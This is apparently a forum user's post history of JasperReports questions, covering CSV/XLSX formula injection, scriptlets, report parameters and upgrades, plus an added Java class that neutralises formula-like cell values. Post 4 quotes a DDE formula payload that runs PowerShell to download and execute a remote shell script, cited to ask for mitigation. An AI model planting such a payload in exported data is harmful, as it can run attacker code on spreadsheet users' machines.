asookaziangmail.com

Posts

  1. I don't see any reference to "formula injection" or "CSV injection" in this official JR server guide: https://community.jaspersoft.com/system/files/restricted-docs/jasperreports-server-security-guide_7.pdf
  2. Compare to this convenient/easy solution by SAP reports (by default it prepends a space to deactivate all formulas in CSV): https://help.sap.com/viewer/2e167338c1b24da9b2a94e68efd79c42/4.2.6/en-US/dbf05bdcd39f4e96a29e2e12a2bca3f5.html
  3. With Jasper Reports library 6.17.0 (latest) it seems there is no way to prevent and/or mitigate potential CSV injection attacks. What is the best practice guidance here regarding CSV injection? Is it supported in 6.x or not? If yes, how to implement/configure? In consideration are formula values (e.g. =HYPERLINK(xxx) or =cmd(xxx)) from database query; we want only these types of values as per a regex pattern to be "deactivated" as formulas when the csv is opened in Excel. The CSV exporter config in SimpleCsvExporterConfiguration for setForceFieldEnclosure does not seem to solve this problem, it simply surrounds all CSV values with a specific character (default is double quote).
  4. Interested in any answers/guidance as well on this topic of formula injection in CSV and XLSX use cases. Reference: https://pentestmag.com/formula-injection/ Is it possible to set some config/property such that the JRXlsxExporter will auto prepend a space or apostrophe in front of "=cmd***" in any textFields that are saved as such in the db tables queried by the report query? For example, assume Person.FirstName value in db table is the following: =cmd|'/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer -source https://141.io/shell.ps; Invoke-Item shell.ps;'!z which could be a malicious download script attempt in formula field. Would it be possible to prevent such attack specifically in the fillReport() intercept or similar? This is "supposed" to solve the problem with Csv (can you provide an example? original poster says doesn't work): http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleCsvExporterConfiguration.html#setForceFieldEnclosure-java.lang.Boolean- Unfortunately, the same APIs don't exist for http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleXlsxExporterConfiguration.html Why don't the same APIs exist for force field enclosure for XLSX?
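Posts 3 and 4 above both ask how to stop database values such as =HYPERLINK(...) or =cmd... from being evaluated once the exported CSV or XLSX is opened in a spreadsheet. The class below is an added example of the usual defensive answer, prefixing formula-like values at the data layer; it is not JasperReports code and calls nothing in its API. The class and method names are assumed, the sample values are constructed, and the trigger-character list follows common CSV-injection guidance (=, +, -, @, tab, carriage return).

```java
import java.util.regex.Pattern;

/**
 * Neutralises cell values that a spreadsheet would otherwise interpret as a formula.
 * Added example for the CSV/XLSX injection questions above; not part of JasperReports.
 */
public final class CsvFormulaGuard {

    // Leading characters that Excel and LibreOffice treat as the start of a formula
    // (tab and CR are included because they can precede a trigger after splitting).
    private static final Pattern FORMULA_TRIGGER = Pattern.compile("^[=+\\-@\\t\\r]");

    // Plain signed numbers are left alone: "-42" is data, not a formula.
    private static final Pattern PLAIN_NUMBER = Pattern.compile("^[+-]?\\d+(\\.\\d+)?$");

    private final String prefix;

    private CsvFormulaGuard(String prefix) {
        this.prefix = prefix;
    }

    /** Apostrophe prefix, the form most CSV-injection guidance recommends. */
    public static CsvFormulaGuard apostrophe() {
        return new CsvFormulaGuard("'");
    }

    /** Space prefix, the approach the SAP documentation linked above describes. */
    public static CsvFormulaGuard space() {
        return new CsvFormulaGuard(" ");
    }

    /** True when the raw value would be evaluated rather than displayed. */
    public boolean isFormulaLike(String value) {
        return value != null
                && FORMULA_TRIGGER.matcher(value).find()
                && !PLAIN_NUMBER.matcher(value).matches();
    }

    /** Returns the value unchanged unless it is formula-like, in which case the prefix is prepended. */
    public String neutralize(String value) {
        return isFormulaLike(value) ? prefix + value : value;
    }

    /**
     * Full CSV field: neutralised first, then quoted with embedded quotes doubled.
     * Quoting alone (what setForceFieldEnclosure provides) does not stop evaluation,
     * which is why the prefix step comes before the enclosure.
     */
    public String toCsvField(String value) {
        String safe = neutralize(value == null ? "" : value);
        return "\"" + safe.replace("\"", "\"\"") + "\"";
    }

    public static void main(String[] args) {
        CsvFormulaGuard guard = CsvFormulaGuard.apostrophe();
        // Constructed sample values standing in for a FirstName column.
        String[] samples = {
            "Alice",
            "=HYPERLINK(\"http://example.invalid\",\"click me\")",
            "@SUM(A1:A3)",
            "-42",
            "O'Brien",
            "plain = text"
        };
        for (String s : samples) {
            System.out.println(guard.toCsvField(s));
        }
    }
}
```

Because JasperReports text field expressions are Java expressions, the helper can be applied during fill rather than in a specific exporter, for example as the expression CsvFormulaGuard.apostrophe().neutralize($F{FirstName}) with the class on the report classpath and declared through an <import> element (package name is yours to choose). A value fixed at fill time reaches the CSV and XLSX exporters alike, which sidesteps the missing XLSX enclosure option noted above. Two caveats: the prefix character stays visible in the opened file, which is the trade-off the SAP space approach accepts, and the trigger list should be checked against whatever spreadsheet your users actually open the export with.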
  5. The following solution allows the user to write reports programmatically using Jasper Reports indirectly. I'm assuming the java class can extend a parent class which may have common input parameters defined. And the child class can add additional input parameters. https://mkyong.com/java/reporting-in-java-using-dynamicreports-and-jasperreports/ Is it possible to have a base master jrxml be extended by a child jrxml? I have researched this extensively and seems nobody asks and there is no solution other than for the template for styles: http://jasperreports.sourceforge.net/sample.reference/templates/index.html I am looking for a master jrxml to extend for inheriting custom defined parameters. thanks.
  6. I have a use case where I need to enforce detail band scriptlet invocations to occur prior to REPORT_MAX_COUNT filter being applied on query resultset. Is this possible? If yes, how? If you add a scriptlet invocation at summary band, is it guaranteed to occur after the detail band scriptlet invocations? We are using Jasper Reports library version 5.6.1. thanks in advance.
  7. We are using Jasper 5.6.1 and Angular 1.x. We would like to implement a multi select drop down control for a particular report. The control would map to one (or more?) input params in the JRXML. Is this supported? In which version? What is best practice for implementing this? We have a custom directive in Angular which successfully implements multi select dropdown in Javascript/HTML via checkboxes and is successfully passing the multiple selected values from the control to the REST service upon form submission to generate the report. The net.sf.jasperreports.engine.JasperFillManager.fill() methods all require Map<String, Object> for parameters param. Our solution is cloning the key (p1 in the example below) for the REST endpoint/URL: http://localhost:8181/web/myReport/generate/pdf?p1=XXX&p1=YYY&p1=ZZZ&pStartDate=2018-11-19+00:00:00&pEndDate=2018-11-20+00:00:00 which results in: http://localhost:8181/web/myReport/generate/pdf?p1=ZZZ&pStartDate=2018-11-19+00:00:00&pEndDate=2018-11-20+00:00:00 because a Map does not allow duplicate keys. Is there any way around this or a better way to solve for multiple select drop downs? Alternate: http://localhost:8181/web/myReport/generate/pdf?p1=XXX,YYY,ZZZ&pStartDate=2018-11-19+00:00:00&pEndDate=2018-11-20+00:00:00 comma delimited list for p1 but not sure this will work either... Also note that p1 is defined as java.lang.String in the JRXML, should it be changed to Map, List, String[] to accommodate?
  8. I am trying to set a non-input parameter's value from a Java scriptlet which extends JRDefaultScriptlet as follows:

     import java.util.Map;

     import net.sf.jasperreports.engine.JRDefaultScriptlet;
     import net.sf.jasperreports.engine.JRScriptletException;
     import net.sf.jasperreports.engine.fill.JRFillParameter;

     public class MyParamScriptlet extends JRDefaultScriptlet {

         @Override
         public void beforeReportInit() throws JRScriptletException {
             // parametersMap is the protected field inherited from JRAbstractScriptlet
             Map<String, JRFillParameter> parametersMap = super.parametersMap;
             JRFillParameter fillParam = parametersMap.get("myParam");
             fillParam.setValue("myParamValue");
             // reset map
             super.parametersMap.put("myParam", fillParam);
         }
     }

     The new value for the myParam parameter is either not being set properly or not taking effect at the proper/expected timing. The value of the param is evaluated/used in a DynamicQueryController similar to this demo: https://www.youtube.com/watch?v=tvddKCeWPBY. Please identify how to resolve this problem. Generally speaking, how would one set a non-input parameter value programmatically? thanks. Jasper Reports 5.6.1.
  9. Using Jasper Reports 5.6.1. We have a report in two formats: CSV and PDF. We have a new requirement which requires scanning a specified field (input param) for invalid values configured in CSV files. We cannot create/populate RDBMS tables instead of using CSV files due to usage of regex for invalid filter patterns/values. We have the need to apply two dynamic filters for this requirement:
     1) remove all rows from detail band which have invalid SSNs, for example
     2) if as a result of application of filter 1 above, there is only one row remaining for the grouping for the detail band, then remove that row as well (the report compares values and for comparison we need minimum 2 rows in detail band per grouping)
     We cannot simply hardcode invalid values in SQL and use NOT IN clause, etc. as the invalid values list in CSV may change in the future. Currently solving by using a scriptlet which is invoked from detail band's printWhenExpression. This invokes a method in the scriptlet for every row in detail bands (thousands or millions of invocations depending on amount of data returned by report's SQL query). If the row needs to be removed/excluded, method returns true, otherwise false. Experimenting with other overridden methods in scriptlet which extends JRDefaultScriptlet like beforeReportInit(). Goal is to see if I can apply the secondary filter (#2 above) in one of these overridden methods. Issue I'm having is I don't know how to remove rows in detail band, remove detail band itself completely, or remove group in the Jasper report programmatically from the scriptlet/class which extends JRDefaultScriptlet. I don't see any examples of how/why/when to use the APIs like beforeReportInit(), etc. Is it possible to achieve this and how? Also concerned about performance degradation as a result. thx. I don't see any examples in this Scriptlet sample blog regarding "It is within these methods you will place your own logic to manipulate data in the report." Also, the Scriptlet.java file is not available/attached at below link apparently. I have yet to see/find an example which shows dataset manipulation in a scriptlet in Jasper. Reference: http://jasperreports.sourceforge.net/sample.reference/scriptlet/
  10. Hi, I'm a JasperReports and iReport n00b. I'm wondering what issues or tips/tricks or advice is known about upgrading from 3.0.0 to 3.7.2 of iReports. We are using these tools to produce PDF files. Specifically, I saw some differences in the foo.jrxml file before and after the upgrade. One difference I’m seeing a lot in the jrxml file is this: isSplitAllowed="true" (new) rather than splitType="Stretch" (old). Is this something to be concerned about? What about needing to upgrade any libraries? Current libs: jasperreports-3.1.2.jar itext-2.1.4.jar